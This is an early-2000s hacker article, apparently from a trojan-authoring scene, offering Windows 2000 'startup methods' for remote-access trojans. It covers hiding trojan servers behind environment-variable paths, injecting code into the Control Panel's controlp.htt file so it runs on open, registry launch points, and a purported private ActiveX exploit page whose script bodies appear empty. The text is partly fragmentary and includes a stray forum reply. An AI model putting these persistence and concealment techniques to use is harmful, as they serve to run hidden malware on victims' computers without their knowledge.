Written by Doc~
Released 3.29.02

New Startup Methods

www.megasecurity.org
This article and the oppinions are the sole belief of the author, and not those of the website. The author acknowledges that there maybe some false information, the author releasing everything at this time fully believes everything to be true, and unless proved otherwise, should be taken so. By reading and or distributing this information you the user are responsible for any actions or responses that may occur.

This version is intended for programmers and rat authors. These are some newer startup methods all methods have been confirmed to work on 2k. Also included are new ways to hide and refer to files without giving their location away. Assume that these methods have not been tried on other versions unless noted. Enjoy please keep this version of this article to yourself I will release a less intensive one on Megasecurity some time later. If you have questions, e mail me and if it works on another os version let me know I m very intrested if this paper has relivance toward other OS versions.

Templated Directories
Windows for easy refrencing uses variables for their most used folders e.g. %systemroot% refers to c:\winnt that is a common one but try %webdir% or %userappdata% This will help to make the actual path of the server obsecure.
Example
%webdir%\server.exe
The average user wont know where to find it. And if you use a common exe for example sol.exe or calc.exe, it will make it hard when they do a search for the exe to distinguish them.

Running Server as a .htt file
In case you aren't aware, .htt files are used as the code for example control pannel. There of course is control.exe and the *.cpl files that go along with it then there is c:\winnt\web\controlp.htt

Contents of controlp.htt

Heres a portion of the code upclose
var L_Intro_Text = "Use the settings in Control Panel to personalize your computer.";
var L_Prompt_Text = "Select an item to view its description.";
var L_Multiple_Text = " items selected.";
If you run control pannel you will see that text in on the left hand side of the window. This may not be new information to you but lets move on. A simple way to ensure your trojan is running. Is either create a program to check on the server or just call the server itself. Code example below:
function Load() {
Info.innerHTML = L_Intro_Text + L_Prompt_Text;
// fix styles
var L_SystemFont1_Text = "MS Sans Serif";
var L_SystemFont2_Text = "MS Shell Dlg";
var L_SystemFont_Text = "Tahoma, Verdana";
var tr = document.body.createTextRange();
alert('executed code');
if (navigator.cpuClass != "Alpha") {
tr.collapse();
var actualFont = tr.queryCommandValue("FontName");
if (actualFont == L_SystemFont1_Text || actualFont == L_SystemFont2_Text)
document.body.style.fontFamily = L_SystemFont_Text;
} else
document.body.style.fontFamily = L_SystemFont_Text;
// call our Resize() function whenever the window gets resized
window.onresize = Resize;

Resize();
}
Thats an example of injecting the code. Heres where you will be privi to Kid Arcades best work yet.

Kid awhile back coded a godwill 1.06 but didn't release it because he wanted to keep the exploit private. Abou 4 people have this code. It compiles the exe on the victims hard driver and runs it, without requiring reboot. Truly a masterpiece. Thanks kid for letting me share it.

<HTML><HEAD></HEAD><BODY onLoad="loadPage()" onMouseMove ="javascript:window.status='Done'" bgcolor='black'><center><font face='verdana' color='#3399CC'><h6>julius caesar:<br><font color='white'>venni viddi vicci <div class='damn' style='position:absolute; visibility:hidden'><APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET></div> <SCRIPT language=JAVASCRIPT> --> </SCRIPT> <script language="vbscript">  </script> </BODY></HTML> Finally heres what a fully done control pannel looks like with kids code and all, in bold is the added parts (Remeber this is only been done for WIN2K):
Open contropl.htt

Magus

I m getting an error with Interface Object I got it to successful go into the control pannel without complications but it pops up with the error like in a web page. Any ideas?
Later'

%SystemRoot%\web\printfld.htm execute c:\winnt\web\printfld.hm
file:///::{20D04FE0-3AEA-1069-A2D8-08002B30309D}/::{21EC2020-3AEA-1069-A2DD-08002B30309D}
cpl = control pannel extension
HKEY_CURRENT_USER\Environment -> %USERPROFILE%\Local Settings\Temp may execute file
file://%userappdata%\Microsoft\Internet Explorer\Desktop.htt = C:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer HKEY_CLASSES_ROOT\CLSID\{00021400-0000-0000-C000-000000000046}

No one is perfect if there is false information or spelling and grammatical errors please e mail me and help me correct them I am firmly against false information and have gone to great lengths to verify everything mentioned above -> E mail -> http://tnt2.ath.cx:5080/kernel32/[email protected]?subject=false info/error
Thanks goes to the following people in no special order:
Cyberfly, M_R and Magus(Thanks for all your help and support :-) ), weed(congrats bro), SilenceGold, dragnet for starting up the kazaa client when needed =), #tnt, Connected, and ap0calaps. Also a huge thank you too Olympus(http://www.lithiumrat.org/) for developing a program for my needs, and to mf4(areyoufearless.com) for also developing code to help me, and for both of their constant programming help. If you have been forgotten I m sure I was having a memory lapse thanks to you too.